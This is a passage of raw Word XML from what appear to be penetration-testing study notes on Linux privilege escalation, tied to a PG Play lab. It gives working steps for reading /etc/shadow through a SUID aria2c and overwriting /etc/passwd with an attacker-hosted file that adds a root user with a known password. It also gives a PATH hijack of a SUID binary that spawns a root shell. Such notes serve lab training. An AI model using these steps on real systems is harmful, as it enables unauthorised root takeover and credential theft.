        <w:t xml:space="preserve"> had a SUID Bit set. LinPeas highlighted this in yellow, and the text was in red. But, the exploit on GTFOBins didn't work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We noticed that we could run this command to read ANY file, including /etc/shadow, meaning that it must have been running as root, since only root can read /etc/shadow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/aria2c -i &lt;any file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002230">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002231">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And so, we also found that /usr/bin/aria2c could overwrite files via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files. So, we can get a copy of the /etc/passwd, upload it to local kali, add a root user, and then use aria2c to overwrite it's own /etc/passwd with a new /etc/passwd sitting in our local kali, so it will be a remote file since it's not on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002232">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002233">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to reproduce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002234">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste the /etc/passwd on target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002235">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/aria2c -i /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002236">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can read the /etc/passwd this way or you can try using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002237">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the contents to a file on your local machine called "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newPasswd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002238">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have it on your local machine, Add user with root rights in the file (you can follow the guide in the "How to add root user if /etc/passwd is writable" section). Here, the password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password@973</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tom:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ad7t5uIalqMws</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:0:0:User_like_root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the file locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload it inside /etc of target machine (must be in /etc directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/aria2c -o passwd "http://&lt;ip&gt;/newPasswd" --allow-overwrite=true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as the user!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su Tom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password@973</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002240">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002241">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s4zm8970gqhu" w:id="303"/>
      <w:bookmarkEnd w:id="303"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002242">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002243">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId733">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetMidnight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw a very interesting attack vector. Using LinPeas, we saw that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/status</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had it's SUID bit set, and we tried looking at this binary, but a lot of it was unreadable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002244">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002245">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="787400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="418" name="image406.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image406.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId734"/>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2246">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002247">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the "strings" command, and by looking at the original "cat" command, we find that the executable is calling the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but not using the absolute path. If we create our own </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file and update the PATH, we may be able to exploit this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002248">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002249">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "/bin/sh" &gt; service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x ./service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/tmp:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/status</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you should have root. We got lucky that the /usr/bin/status was running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002251">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022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53">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xqphf8f4p8bk" w:id="304"/>
      <w:bookmarkEnd w:id="304"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SGID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002254">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002255">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same thing as SUID, but instead of being able to execute a file via the permissions of the owner, you get to execute the file via the permissions of the group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002256">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm /2000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002258">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="814"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic SGID Search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002259">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -g=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="778"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict to Regular Files Only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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5F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sm6db4o8ccn2" w:id="305"/>
      <w:bookmarkEnd w:id="305"/>
